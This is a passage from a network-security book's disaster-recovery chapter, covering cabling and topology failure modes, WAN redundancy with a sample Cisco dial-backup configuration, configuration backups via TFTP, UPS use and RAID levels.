service solution because it \nhelps to insure that file services remain available. \nNow let’s assume that a user comes to you and claims that she needs to retrieve a file that \nshe deleted three months ago. Despite the passage of so much time, this information is now \ncritical to performing her job, and the information cannot be re-created. \nIf mirroring is the only disaster recovery procedure you have in place on this file server, then \nyou are in deep trouble. While mirroring insures that files get saved to both hard drives in the \nmirrored pair, mirroring also insures that deleted files are removed in both as well. Mirroring \nprovides no way to recover this lost information, making it an ineffective information recovery \nsolution. \nTip \nWhen identifying a full disaster recovery solution, make sure you find methods to \nrecover from service failures as well as to recover lost information. Both are critical \nto insuring that you have a contingency plan in any disaster situation. \n \nNetwork Disasters \nWhile network disasters have the ability to shut down communications through an entire organization, they \nreceive very little attention compared to their server counterparts. Most organizations will take great strides to \ninsure that a server remains available. Very few subject the network to the same level of scrutiny, even though it is \nthe network that will get them to this server. Without a functioning network, a server is of little use. \nIn the next sections, we’ll review different network technologies and their potential vulnerabilities that might lead \nto loss of network functionality. Although this might seem to be a lot of information (and a lot of it is based on \ncommon sense), a thorough understanding of these vulnerabilities and characteristics in general contributes greatly \nto overall troubleshooting—especially when a failure is not readily apparent. \nMedia \nGood disaster recovery procedures start with your network media. While physical cables are still the predominant \nmedia for most LANs, wireless is rapidly growing as an option, and must be considered as part of the overall \ndisaster recovery. If you do chose cable, the cabling you choose will go a long way toward specifying how \nresilient your network will be in case of failure. Whichever media you choose will carry all of your network \ncommunications, so a failure at this level can be devastating. \n" }, { "page_number": 235, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 235\nThinnet and Thicknet \nThinnet and Thicknet cabling date back to the original Ethernet specifications of the ’70s. Both cable \nspecifications allow multiple systems to be attached to the same logical segment of cable. This provides a central \npoint of failure, because if any portion of this length of cable becomes faulty, every system attached to it will be \nunable to communicate. \nI can honestly say that out of the 100+ companies I have consulted for over the past two years, not one of them \nwas considering a new network installation that included Thinnet or Thicknet cable. Unfortunately, at least 15 \npercent of them still used Thinnet to attach workstations and/or servers to the network. Two of them were still \nusing Thicknet. \nTip \nOne of the biggest improvements you can make to network availability is to replace Thinnet \nand Thicknet cabling with a more modern solution. \nTwisted Pair \nCategory 5 (CAT5) cabling is the current cabling standard for most network installations. While this will \neventually be replaced with fiber due to increasing bandwidth requirements, the wide installation base of CAT5 \ncable will guarantee that it will be included in future topology specifications for at least a few more years. For \nexample, while Gigabit Ethernet is based on fiber, concessions have been made to include CAT5 cabling for short \ncable runs (50–75 meters). \nThe problem arises from the amount of category 3 (CAT3) cabling that is still in use, as well as the number of \ncabling installations that have only been tested for 10Mb operation. CAT5 does not guarantee that 100Mb or faster \noperation is possible; it only provides the ability to support these speeds. The CAT5 components must be properly \nassembled and tested to function properly. \nIt is entirely possible that CAT3 cabling or improperly installed CAT5 cabling will allow you to hook up 100Mb \nor higher devices and have them communicate with each other. Problems typically do not occur until a heavy load \nis placed on the network. Of course, a heavy load typically means that you have many users relying on network \nservices. Problems due to poor cabling can take the form of slow network performance, frequent packet \nretransmissions due to errors, or even disconnection of users from services. \nYour best preventive medicine for avoiding twisted-pair cabling problems is to test and certify your cables before \nuse. If this is not possible, or if you have been pressed into using below-grade cabling, consider segmenting these \nproblem areas with one or more switches. A switch has the ability to trap packet errors and to isolate transmissions \ninto multiple collision domains. While this will not fix the errors, it will limit the scope of the effect that your \ncable problems have on the rest of your network. \nFiber Cabling \nSince fiber uses light for transmitting network information, it is immune to the effects of electromagnetic \ninterference (EMI). EMI can cause transmission errors, especially if the cabling is under heavy load. This makes \nfiber an excellent choice for avoiding EMI failures, thus increasing the availability of services the fiber cable is \nconnecting. \nNote \nFor a detailed discussion of fiber cable, see Chapter 4. \nExcessive Cable Lengths \nEvery logical topology has specifications that identify the maximum cable lengths you can use. For example, \n10Mb and 100Mb Ethernet both specify that twisted-pair cable runs cannot exceed 100 meters. These rules exist to \ninsure that a system at one end of the cable run can properly detect the transmissions of a system located at the \nopposite end. \nExceeding these topology specifications for cable length can produce intermittent failures due to low signal \nstrength and slow down communications along the entire segment due to an increase in collisions. Since these \nproblems will not be consistent, they can be very difficult to troubleshoot. \nTip \nA good cable tester is the quickest way to tell if you have exceeded cable-length limitations \nfor your logical topology. \n" }, { "page_number": 236, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 236\nWireless Technologies \nSome organizations are choosing wireless as their media of choice. While wireless technologies have existed for \nquite some time, slow transfer speeds and lack of open, common standards have limited its market penetration \nuntil now. With the adoption of new technologies and standards (802.1b1, in particular), high-speed wireless LAN \n(WLAN) is now technically feasible. \nA WLAN is a transmission system that is designed to be location-independent, allowing network access using \nradio waves rather than a cable infrastructure. In corporate environments, WLANs are usually used as the final \nlink between an existing wired network and a group of client computers. \nHowever, there are still threats to a wireless infrastructure: \nInterference Although 802.11b, in particular, is the preferred wireless LAN standard, other \ncompeting wireless standards still exist (HomeRF and Bluetooth). In the fall of 2000, the FCC ruled \nthat HomeRF could increase its range of frequencies to overlap with that of 802.11b. While \nHomeRF uses frequency-hopping that allows traffic to move from frequency to frequency in search \nof the best signal (and avoid other signals), 802.11b does not. As a result, there is a very real \npossibility that stations running 802.11b protocol could interfere with those running HomeRF. \nInstallation and configuration What seems like the advantage of a wireless network can actually \nbe the source of most of its problems. Mobile users have to be handed off from one AP (Access \nPoint) to another, just as a cell phone is handed off from one cell tower to another as the caller \nmoves between cells. If there are not enough APs to cover an area or if they are incorrectly \nconfigured, communication with the network can be lost. \nIt is important to note that wireless technologies can be a positive part of any organization’s disaster recovery \nplan—used as a backup in case there is a failure in the wiring infrastructure of an organization. Also, because \nWLANs are usually added gradually to an existing wire-based network, the wires themselves become the backup \nplan in case the WLAN fails. \nTopology \nThe topology you choose can also have a dramatic effect on how resilient your network will be in case of failure. \nAs you will see in the following sections, some topologies do a better job than others of recovering from the day-\nto-day problems that can happen on any network. Changing your topology may not be an option. If not, then this \nsection will at least point out some of the common problems you may encounter and give you an idea of possible \ncontingency plans. \nEthernet \nEthernet has become the topology of choice for most networking environments. When used with twisted-pair \ncabling, the topology can be extremely resistant to failure due to cabling problems on any single segment. This \nhelps to isolate problems so that only a single system will be affected. Of course, if this single system happens to \nbe one of your servers, the break in connectivity can still affect multiple users. \nThe biggest flaw in Ethernet is that a single system is capable of gobbling up all of the available bandwidth. While \nthis is an uncommon occurrence with modern network cards, older network interface cards (NIC) were prone to a \nproblem known as jabbering. A jabbering network card was a NIC with a faulty transceiver that would cause it to \ncontinually transmit traffic onto the network. This would cause every other system on the network to stop \ntransmitting and wait for the jabbering card to finish transmitting. Since the faulty card would continue to jabber \nas long as it had power, network communications would grind to a halt. \nDue to improvements in technology, jabbering network cards are now rare. The introduction of switching has also \nmade jabbering NICs less of an issue. When a NIC jabbers, the packets it transmits are not legal Ethernet packets. \n" }, { "page_number": 237, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 237\nThis means that a switch checking for errors will reject these packets and not forward them on to the rest of the \nnetwork. This isolates the problem system so that it does not affect the operation of other systems on the network. \nToken Ring \nWhile Token Ring was designed to be fault tolerant, it is not without its problems. Token Ring is a wonderful \ntopology when all systems operate as intended. For example, a NIC attached to a Token Ring network is capable \nof performing a self-diagnostic check if other NICs on the ring inform it that there may be a problem. Obviously, a \nfaulty NIC may not be able to perform a true diagnostic check. If the NIC thinks that it is OK, it will jump back in \nthe ring and continue to cause problems. \nOne possible error condition with Token Ring is having a NIC detect, or be preprogrammed with, the wrong ring \nspeed. Since Token Ring requires that each system successively pass the token to the next, a single NIC set to the \nwrong speed can bring down the entire ring. For example, let’s say that every system on a ring is set to 16Mb. If a \nsystem joins this ring but has been hard set to 4Mb, all communication will stop. This is because the new system \nwill pass the token too slowly, causing the other systems to think the token has become lost. When the token is \npassed along, the error condition is clear—but only until the incorrectly configured system grabs the token again. \nThis will cause the ring to flap back and forth between an operational and a dysfunctional state. \nA Token Ring switch will mitigate the effect that a single system set to the wrong ring speed will have on the rest \nof the network. In fact, depending on the switch, this one system may very well be able to operate at 4Mb while \nthe rest of the ring runs at 16Mb. Unfortunately, Token Ring switches are less popular and far more expensive \nthan their Ethernet counterparts. This has severely limited their application in the field. \nNote \nAn Ethernet network would not have the same difficulty. If a single system were set to the \nwrong topology speed, only that one system would be affected. All other systems would \ncontinue to communicate as usual. \nWhat happens with Token Ring if two systems have the same media access control (MAC) number? In an \nEthernet environment, a duplicate MAC only affects the two systems attempting to use the same number. In Token \nRing, however, a duplicate MAC can bring down the entire ring. This is because Token Ring requires that every \nsystem keep track of the MAC address used by its upstream neighbor (the previous system on the ring) and its \ndownstream neighbor (the next system on the ring). Duplicate MAC addresses completely confuse the systems on \nthe ring as they attempt to figure out who is located where. \nFDDI \nFiber Distributed Data Interface (FDDI) is also a ring topology, but a second ring has been added in order to \nrectify many of the problems found in Token Ring. This second ring remains dormant until an error condition is \ndetected. When this occurs, the FDDI systems can work together in order to isolate the problem area. FDDI is \nconsidered to be a dying technology because no effort has been made to increase speeds beyond 100Mb. The \ntechnology is still worth considering, however, due to its fault-tolerant nature. \nNote \nFDDI can be run in full duplex mode, which allows both rings to be active at all times. \nEnabling this feature, however, eliminates the use of the second ring for redundancy. \nIn an FDDI ring environment, each station is connected to both rings in order to guard against cable or hardware \nfailure. Let’s assume that you have a cable failure between two of the routers shown in Figure 12.1. When this \ncable failure occurs, the system immediately downstream from the failure will quickly realize it is no longer \nreceiving data. It then begins to send out a special maintenance packet called a beacon. A beacon is used by token \nstations to let other systems around the ring know it has detected a problem. A beacon frame is a system’s way of \nsaying, “Hey, I think there is a problem between me and my upstream neighbor because I am no longer receiving \ndata from it.” The station would then initialize its connection on the secondary ring so that it would now send and \nreceive data on Connector A. \n" }, { "page_number": 238, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 238\n \nFigure 12.1: Four routers connected to an FDDI ring \nThe beacon packet would continue to be forwarded until it reached the beaconing system’s upstream neighbor. \nThis upstream neighbor would then initialize its connection to the secondary ring by sending and receiving on \nConnector B. This, in effect, isolates the problem area and returns normal connectivity. When the beaconing \nstation begins to receive its own beacons, it ceases transmission, and ring operation returns to normal. The final \ntransmission path would resemble the network shown in Figure 12.2. By using beacon frames, the systems on the \nnetwork can determine the failure area and isolate it by activating the secondary ring. \n \nFigure 12.2: How FDDI stations recover from a cable failure \nIf this had, in fact, been a hardware failure caused by a fault in the upstream neighbor and that system was unable \nto initialize the secondary ring, the faulty system’s upstream neighbor would have detected this and stepped in to \nclose the ring. This would isolate the problem hardware but allow the rest of the network to continue to function. \nEach router would continue to monitor the faulty links until connectivity appears to be restored. If the link passes \nan integrity test, the primary ring returns to full operation, and the secondary ring again goes dormant. This type of \nnetwork fault tolerance can be deemed critical in environments where connectivity must be maintained seven days \na week, 24 hours a day (referred to as 24 × 7 operation). This functionality is what still makes FDDI the most \nfault-tolerant networking topology available today for local area networks. \n" }, { "page_number": 239, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 239\nNote \nFDDI also supports a star topology, which does not provide any redundancy. An \nFDDI network can consist of both star and ring connections. \n802.11b (WLAN) \nThe 802.11b standard defines two primary players: \nStation Usually, this would be a PC equipped with a wireless NIC. \nAccess Point (AP) Acts as a bridge between a wired network and wireless computers. Consisting \nof a radio, a wired interface (Ethernet), and bridging software, the AP is the base that allows one or \nmore stations to connect to the network. \n802.11b also works in two modes: \nInfrastructure Also called a Basic Service Set (BSS), this mode is a wireless network that has at least \none access point connected to a wired network and one to a group of one or more wireless stations. \nTwo or more BSSs in a single subnetwork is called an Extended Service Set (ESS). Infrastructure mode \nis the most common for corporate environments. \nAd Hoc This is known as Independent BSS (IBSS) or peer-to-peer mode. It consists simply of a group of \nwireless stations that communicate directly without the bridging services of an AP. \nLike Ethernet (802.3), 802.11b forces the sender to listen to the medium before transmitting. In Ethernet, the full \naccess protocol is known as Carrier Sense Multiple Access with Collision Detection (CSMA/CD). In a wireless \nnetwork, however, collision detection is not possible, because a station cannot transmit and listen at the same \ntime—and therefore cannot “hear” a collision occurring. \nTo compensate, 802.11b uses a modification called Carrier Sense Multiple Access with Collision Avoidance \n(CSMA/CA). CSMA/CA works like this: the sender listens, and if no activity is detected it waits an additional \nrandom amount of time, and it then transmits. If the packet is received intact, the receiver issues an \nacknowledgment to the sender, which completes the process. If an acknowledgment isn’t received, a collision is \nassumed, and the packet is retransmitted. Unfortunately, CSMA/CA adds additional overhead, which means that \nan 802.11 network will be slower than an equivalent speed Ethernet network. \nAnother potential problem is known as the “hidden node,” in which two stations on opposite sides of an access \npoint can both “hear” activity from an access point but not from each other. Fortunately 802.11b has an option \ncalled Request to Send/Clear to Send (RTS/CTS). This protocol dictates that a sender transmit an RTS first, and \nthen wait for a CTS from the AP. Since all stations can hear the AP, waiting for the CTS causes them to delay \ntransmitting, eventually allowing each sender to communicate without any chance of a collision. RTS/CTS causes \noverhead, however, which is another potential negative. \nDesigning a WLAN with multiple APs avoids having a single point of failure. Although reassociation with a new \nAP usually occurs because the station has physically moved away from its original AP, it can also occur if there is \na change in radio characteristics or high network traffic—essentially providing a load balancing feature. \nLeased Line or T1 Connections \nPrivate-circuit WAN topologies, such as leased lines or T1 connections, are good at insuring privacy, but they also \nintroduce a single point of failure. A leased line or T1 circuit is the equivalent of a single, long cable run between \ntwo of your geographically separated sites. If any portion of this circuit is interrupted, there is no built-in \nredundancy to insure that information can still be exchanged between these two sites. \nIf you will be using a private circuit, consider an analog or ISDN redundancy option, discussed later in this \nsection. This is particularly important if you are following the latest trend of removing servers from field offices \nand consolidating them in a central location. While this provides a single point of management, it also creates a \n" }, { "page_number": 240, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 240\nsingle point of failure. If a field office that does not have a server loses its private circuit connection to the main \noffice, that field office is without network resources. If the company had also moved to a thin-client architecture, \nthen this field office would be down completely. \nFrame Relay \nFrame relay is also capable of providing WAN connectivity, but it does so across a shared public network. This \nnetwork is packet switched, meaning that if any segment within the frame relay cloud experiences a failure, traffic \ncan be diverted across operational links. While this may cause a bit of traffic congestion, at least you still have \nconnectivity. \nIt is not impossible, however, for the entire frame relay network to go down. This has happened recently to both \nMCI and AT&T. In both cases, all customers experienced downtime. This varied from a few hours to a few days, \ndepending on the client’s location. While outages are rare, these failures have shown that they are possible. \nTip \nWhile frame relay does provide better fault tolerance than private circuits, it is not immune \nto failure. If you have a WAN segment running over frame relay which absolutely must \nremain operational 24 × 7, consider building in some redundancy to the circuit. \nIntegrated Services Digital Network (ISDN) \nISDN is a telephone company technology that provides digital service, typically in increments of 64Kbps. ISDN \nhas been available since the early 1980s, but it has only seen broad implementation in the last part of the ’90s \nbecause of the limitations of analog modems and the rising popularity of the newer packet-switched technologies. \nISDN requires that the phone company install services within their phone switches to support digitally switched \nconnections. ISDN was initially stalled by high costs, lack of standards, and low acceptance by consumers. \nBecause the circuits involved in an ISDN connection are dedicated, any interruption with a single circuit will \ncause the entire connection to fail. While still a viable option for some organizations, and in some areas the only \nchoice of cheap Internet access, most modern companies find that emerging DSL technology is cheaper and more \nflexible—although even DSL has been plagued with its own implementation problems. Still, ISDN remains a \nknown technology that has a solid performance history and does not have any recent history of major failures. \nDigital Subscriber Line (DSL) \nDigital Subscriber Line (DSL) is similar to ISDN in that both use existing copper telephone lines and both require \nshort distances to a central switching office (less than 18,000 feet). DSL is circuit-oriented, but instead of utilizing \nfixed physical circuits for the entire length of the connection, DSL simply needs a complete circuit to the LECs \nPOP. This dramatically reduces the amount of failure points in any given connection. DSL can also provide a \ndramatically higher level of speed than ISDN—up to 32Mbps downstream and up to 1Mbps upstream. This speed \nis not fixed like ISDN or a T1, and this can cause problems for some organizations that require dedicated \nthroughput (in both directions of the connection) for video conferencing or other multimedia uses. \nSingle Points of Failure \nAs you may have surmised from the previous section, one of the best ways to eliminate disasters on a network is \nto identify single points of failure and either build in redundancy or develop a contingency plan. Unknowingly \ncreating a single point of failure is the most common mistake made in a network design. \nFor example, consider the configuration of the average Internet connection: \nƒ \nA single firewall \nƒ \nA single router \nƒ \nA single CSU/DSU \nƒ \nA single leased line or T1 connection \nThis configuration has three electronic devices, as well as a network circuit that is not under your control—all \ncapable of interrupting Internet service. The electronic devices are not exactly components you can replace by \nrunning down to the local Radio Shack. The WAN circuit is controlled by your local exchange carrier, so the \nresponse time you receive to problems may be directly affected by the business relationship you have with the \nlocal exchange carrier. (Translation: “The more money you spend on a monthly basis, the more likely you are to \nsee a service tech by the end of the millennium.”) \n" }, { "page_number": 241, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 241\nWhile these issues may not be a big deal for some organizations, many do rely on Internet connectivity as part of \ntheir daily business practices. It is possible that when Internet connectivity was first established, consistent access \nto Internet services may not have seemed important or been considered a critical business function. Now that \nInternet access has become a critical business function, no one has gone back to evaluate the impact of the loss of \nthis service. \nSo you need to go back to your risk analysis and identify your single points of network failure. You also need to \nevaluate the effect that loss of service will have on your organization. If any point in your network can be \nconsidered critical, you need to build in redundancy. \nConsolidated Equipment \nIn the early 1990s, chassis hubs became extremely popular due to their high port density and single point of \nmanagement. It was not uncommon to have 200 or more systems connected through a single hub. Of course, \nneither was it uncommon to have 200 or more users who were unable to access network resources because a \npower supply or a single management board had failed. This is why many organizations have stuck with stackable \nhubs; although these require more rack space, the failure of a single unit does not bring down an entire network. \nThere has been a resurgence of interest in consolidated solutions with the release of the Cisco’s 5000 series switch, \nas well as multiple product offerings from Cabletron. Like their chassis hub predecessors, these products claim \nlower administration costs due to a central point of management. While there is validity in this claim, it does not \nspeak to financial loss due to a catastrophic failure of a single device. \nStackable solutions provide you with more flexibility in recovering from a failure. For example, if you are using \nsix stackable switches instead of a single consolidated unit and one of these switches fails, you will not experience \na complete network outage. Although you still have a failed device to deal with, you at least have some breathing \nspace. You can use the remaining five units in order to continue providing services to important users such as your \nboss (if the outage coincides with your review), the person who cuts the weekly payroll, and that administrative \nassistant who drops off brownies every holiday. \nTaking Advantage of Redundant LAN Routes \nAs you saw in Chapter 3, dynamic routing can be used to take advantage of multiple paths between network \nsegments. Some routing protocols will even take such metrics as network utilization into account when \ndetermining which path is the best route along which to forward your traffic. \nWhile static routes are your best bet when only a single path is available (such as a WAN link) or in areas where \nyou are concerned that an attacker may corrupt the routing table (such as an Internet connection), for the majority \nof your internal network you should use a dynamic routing protocol such as OSPF. If there is only one connection \npoint between each of your routed segments, consider purchasing another router for redundancy or adding more \nnetwork cards to one of your servers. Using metrics such as hop count and cost, you can configure your network to \nonly route through the server in case of emergency. This will help to insure that the server does not experience \nadditional load unless the primary router fails. \nDial Backup for WAN Connections \nWAN connections are prime candidates for providing a single point of failure. Due to the recurrent costs of \nmaintaining a WAN link, most organizations do not build any type of redundancy into their wide-area network. \nThis is a shame, because you have no real control over this portion of your network. You are at the mercy of your \nexchange carrier to feel your urgency and rectify the problem as soon as possible. \nOne potential solution is to configure your border routers to fail over to a backup circuit if the primary line fails. \nThis backup can be an analog dial-up line along with a couple of modems, or you could go for increased \nbandwidth by utilizing an ISDN solution. In either case, you will have a lot less available bandwidth if the line that \nfails is a full T1, but you are better off being able to provide a minimal amount of bandwidth between your two \nlocations than no bandwidth at all. \nConfiguring a router to perform dial backup is not difficult. The following example shows the commands required \nfor a Cisco router to bring up an ISDN connection on bri 0 when the primary circuit on serial 0 fails to respond: \ninterface serial 0 \n backup delay 10 120 \n backup interface bri 0 \n ip address 192.168.5.1 255.255.255.0 \n" }, { "page_number": 242, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 242\n! \ninterface bri 0 \n ip address 192.168.5.2 255.255.255.0 \n dialer string 5551212 \n dialer-group 1 \n dialer in-band \n dialer string 5551212 \n async dynamic routing \n! \ndialer-list 1 protocol ip permit \nThis configuration tells the router that if serial 0 fails to respond for 10 seconds, the bri 0 interface should be \ninitiated as an alternate path. Likewise, if the serial 0 circuit returns to operation for a minimum of 120 seconds, \nthe bri 0 line should be torn down. The dialer-list command identifies the type of traffic that can bring up the \nalternate circuit path. In this case, we have specified that any IP traffic is capable of initiating the circuit. \nTip \nIf you are using ISDN as a backup solution, and you are using a primary rate ISDN (PRI) \ninterface at your main office in order to accept basic rate ISDN (BRI) connects from \nmultiple field offices, remember that the call will have to be initiated from the BRI side of \nthe circuit. \nSaving Configuration Files \nAll of the network disaster solutions we’ve discussed until now have dealt with availability of service. As \nmentioned earlier in this chapter, no disaster recovery solution is complete unless you are able to restore lost \ninformation, as well. In this case, we are not talking about your data that is traveling along the network. Protocols \ndo a very good job of insuring that this information does not become lost. The real concern is the configuration \nfiles that you use to program routers, switches, and even hubs along your network. \nWhen a network device fails, chances are you will also lose the configuration that has been programmed into it. It \nis also possible that someone may inadvertently change the configuration to an unusable state. If either of these \nevents occurs, it is a good thing to have a backup of your configuration file so that the original setup can be \nrestored. This is also useful for historic purposes, when you wish to see what changes have been made to your \nnetwork and when. \nTerminal Logging \nThe easiest way to save your configuration information is terminal logging. Most terminal emulation and telnet \nprograms have some method of recording all the information that passes by on the terminal screen. If your \nnetworking device has a single command that shows all configuration information, you can use terminal logging to \narchive this information for later retrieval. \nSome devices, such as Cisco routers and switches, will let you paste this information to your terminal screen in \norder to configure the device. For example, the write term command will display all configuration information to \nthe terminal screen. This allows this configuration information to be easily saved. If the device should fail later, \nsimply open a terminal session with the new device and place it in configuration mode. Copy the original \nconfiguration of the original device to your Clipboard (using Notepad or WordPad), and paste it into the terminal \nscreen connected to the new device. Save the configuration, and your replacement is ready for action. \nThe drawback to terminal logging is that it only works for configuration; you cannot save the operating system. \nAlso, if your network device does not provide a single command for displaying all configuration information, the \nprocess of recording the full configuration can be tedious. \nTrivial File Transfer Protocol (TFTP) Server \nTrivial File Transfer Protocol (TFTP) is similar to FTP, except that it uses UDP as a transport and does not use \nany type of authentication. When a client wishes to retrieve a file from a TFTP server or save a file to a TFTP \nserver, it simply needs to know the file’s name and the IP address of the TFTP server. There are no command \nparameters that allow you to authenticate or even change to a new directory. \nGiven the lack of authentication, TFTP is not exactly something you want coming through your firewall. Most \nnetworking devices, however, support TFTP for saving or retrieving configuration information. A single TFTP \nserver can archive configuration files for every device on your network. If a device on your network fails, simply \nplug it in, assign an IP address, and use TFTP to retrieve the required configuration file. \n" }, { "page_number": 243, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 243\nTip \nMost vendors use TFTP in order to configure devices with their latest operating system \nversions. This means that you can keep a known-to-be-stable operating system version on \nthe TFTP server with the required configuration file. When a device needs to be replaced, \nsimply use TFTP to load both the operating system and the configuration file from the \nTFTP server. \nBy saving the configuration information from your network devices, you can be assured of recovering from a \nnetwork disaster as quickly as possible. Few things in life are a greater letdown than having a network device fail \nand finally receiving the replacement, only to discover that you do not remember the configuration of the original \ndevice and you will have to spend the next few hours playing trial-and-error. \n \nServer Disasters \nNow that you have seen how to make your network more fault tolerant, it is time to consider your servers. There is \na wide range of options available in order to make servers more disaster resistant. The only limiting factors are \nyour budget and, in some cases, your operating system—not all solutions are available for every platform. Disaster \nprevention on a server is usually viewed as being the most costly, as we can typically only justify the expenditure \non a single system. \nUninterruptible Power Supply (UPS) \nWhile all computers need a source of clean and steady power, this is even more important when the computer will \nact as a server, because multiple users will rely on the system. A good power source is not just one that is free \nfrom blackout or brownout conditions; it should be free of surges and spikes, as well. \nAs little as a 10 percent fluctuation in power can cause an error condition on a computer, even less if it is in the \nform of a steady stream of noise. While brownouts or blackouts are easy to identify because they will cause the \nsystem to reboot, spikes, surges, and noise can cause far more subtle problems, such as the application error just \ndescribed. Electrical power is like network wiring: we do not think to check it until we have spent time chasing \nour tails replacing drivers and loading patches. \nTracking Down Power Problems \nI was once called in by a client to troubleshoot a problem with some backup software on a NetWare server. The \nbackup software appeared to be hanging the server and causing 100 percent CPU utilization. The problem was not \ncompletely consistent: it happened during random stages of the backup process. What was odd, however, was that \nit only happened on Monday and Thursday nights between 7:30 PM and 8:00 PM, even though the client ran the \nbackup every night. The problem could not be reproduced during regular business hours. Installing all current \npatches had no effect. \nI decided to work late one Thursday night to see if I could diagnose the problem. At 7:00 PM, the cleanup crew \ncame in and started emptying waste baskets and vacuuming the rugs. At approximately 7:40 PM, a member of the \ncleaning crew plugged a vacuum into an outlet just outside the server room. \nAll ran fine until the vacuum was powered off. The resulting power spike immediately caused a 100 percent CPU \nrace condition on the server. I asked the employee if the crew vacuumed this office space every night and was told \nthat while the crew emptied wastebaskets every night, they only vacuumed on Mondays and Thursdays. Needless \nto say, the client had a UPS installed by Monday—and the problem was solved. \n \nTip \nWhile a good UPS is an excellent idea for any computer system, it should be considered critical \nequipment for your servers. An intelligent UPS will include software that can shut down the \nserver if power is unavailable for a specific amount of time. This insures that your server does \nnot come crashing down once the battery supply has run dry. \nRAID \nRAID, or redundant array of inexpensive disks, not only provides fault tolerance against hard disk crashes; it can \nalso improve system performance. RAID breaks up or copies the data you wish to save across multiple hard disks. \nThis prevents a system failure due to the crash of a single drive. It also improves performance, as multiple disks \ncan work together in order to save large files simultaneously. \n" }, { "page_number": 244, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 244\nThe process of breaking up data across multiple disks is referred to as striping. Depending on the level of RAID \nyou are using, the system may also store parity information known as Error Correction Code (ECC). Some RAID \nsystems are hot swappable, meaning you can replace drives while the computer is still in use, reducing downtime \nto zero. \nRAID can be implemented as either a hardware or a software solution. With hardware RAID, the RAID controller \ntakes care of all RAID functionality, making the array appear as a single logical disk to the operating system. \nSoftware RAID is program code, which is either part of the existing operating system or available as add-on \nsoftware. Software RAID is usually slower than hardware RAID because it requires more CPU utilization. \nRegardless of the solution you use, RAID classifications are broken up into different levels: RAID 0–RAID 5. \nNote \nThere are classifications for RAID 6–RAID 10, but these are simply variations on the \noriginal six specifications. \nRAID 0 \nRAID 0 is used strictly for performance gains and provides no fault tolerance. Instead of saving a file to a single \ndisk, RAID 0 stripes the data across multiple hard drives. This improves performance by letting the drives share \nthe storage load—but it also increases the chance of failure, as any one disk crash will disable the entire array. \nBecause of the lack of fault tolerance, RAID 0 is not widely used. \nRAID 1 \nRAID 1 maintains a full copy of all file information on every disk. This is why RAID 1 is sometimes referred to as \ndisk mirroring. If a single disk fails, each of the remaining disks has a full copy of the entire file system. This \nprevents a system crash due to the failure of any one disk. This also means that disk storage is limited to the size \nof a single disk. In other words, if you have two 4GB drives mirrored together, you only have 4GB of available \nstorage, not 8GB. \nA RAID 1 disk array will actually perform worse than a single disk solution. This is because the disk controller \nmust send a full copy of each file to every single drive. This limits the speed of the array to that of the slowest \ndisk. Novell developed a term for a variation on disk mirroring called disk duplexing. Disk duplexing functions in \nthe same way as disk mirroring, except that multiple controller cards are used. This helps to eliminate some of the \nperformance degradation because each controller only needs to communicate with a single drive. Duplexing also \nhelps to increase fault tolerance because the system can survive not only a drive failure, but a controller failure, as \nwell. \nRAID 2 \nRAID 2 is similar to RAID 5, except that data is stored to disk one byte at a time. Error correction is also used to \nprevent a single drive failure from disabling the array. The block mode data transfer used by other RAID \nspecifications is far more efficient than the byte mode used by RAID 2. This causes RAID 2 to suffer from \nextremely poor performance, especially when dealing with multiple small files. Due to its poor performance, \nRAID 2 is not widely used. \nRAID 3 and RAID 4 \nRAID 3 and RAID 4 are identical specifications, except that RAID 3 involves the use of three disks and RAID 4 \ninvolves the use of four. These RAID specifications dedicate a single disk to error correction and stripe the data \nacross the remaining disks. In other words, in a RAID 4 array, disks 1–3 will contain striped data, while disk 4 will \nbe dedicated to error correction. This allows the array to remain functional through the loss of a single drive. \nThe ECC is essentially a mathematical summation of the data stored on all the other hard drives. This ECC value \nis generated on a block-by-block basis. For example, consider the following math problem: \n3 + 4 + 2 + 6 = 15 \nThink of all the values to the left of the equals sign as data that is stored to a specific block on each data disk in a \nRAID 4 array. Think of the total as the value stored to the same block on the parity drive. Now let’s assume that \ndisk 3 crashes and a file request is made of this group of blocks. The RAID array is presented with the following \nproblem: \n3 + 4 + ? + 6 = 15 \n" }, { "page_number": 245, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 245\nAs you can see, it is pretty easy to derive the missing value. While this will require a bit more processing, thus \nslowing down disk access a bit, the array can reproduce the missing data and return the file information. While this \nexample is greatly simplified, it essentially shows how RAID levels 3–5 recover from a disk failure. \nRAID levels 3 and 4 are where you start to see an improvement in performance over using a single disk. You also \ntake less of a storage hit in order to provide fault tolerance. Since data is stored on all the disks but one, the total \nstorage capacity of a RAID 3 or RAID 4 array is the total storage of all the disks, minus the storage of one of \nthem. In other words, if you have four 4GB drives in a RAID 4 configuration, you will have 12GB of available \nstorage. \nRAID 5 \nRAID 5 is similar to RAID 3 and RAID 4, except that all disks are used for both data and ECC storage. This helps \nto improve speed over RAID 3 and RAID 4, which can suffer from bottlenecks on the parity drive. It also helps to \nimprove capacity, as you can use more than five drives on a RAID 5 array. Like RAID 3 and 4, the total storage \ncapacity is the combined storage of all the disks minus one. RAID 5 is by far the most popular RAID solution after \ndisk mirroring. \nRedundant Servers \nServer redundancy takes the concept of RAID and applies it to the entire computer. Sometimes referred to as \nserver fault tolerance, redundant servers provide one or more entire systems to be available in case the primary \none crashes. It does not matter if the crash is due to a drive crash, a memory error, or even a motherboard failure. \nOnce the primary server stops responding to requests, the redundant system steps in to take over. \nAs shown in Figure 12.3, redundant servers typically share two communication channels. One is their network \nconnection, while the other is a high-speed link between the two systems. Depending on the implementation, this \nlink can be created using proprietary communication cards or possibly 100Mb Ethernet cards. Updates are fed to \nthe secondary via this high-speed link. Depending on the implementation, these updates may simply be disk \ninformation or may possibly include memory address information, as well. \nNote \nWhen memory address information is included, the secondary is capable of stepping in for \nthe primary with no interruption in service. \n \nFigure 12.3: A redundant server configuration \nNot all redundant server solutions include a high-speed link. For example, Octopus, which is discussed at length at \nthe end of this chapter, uses the server’s network connection when exchanging information. Octopus does not \nrequire a high-speed link between the two systems. The benefit of using the existing 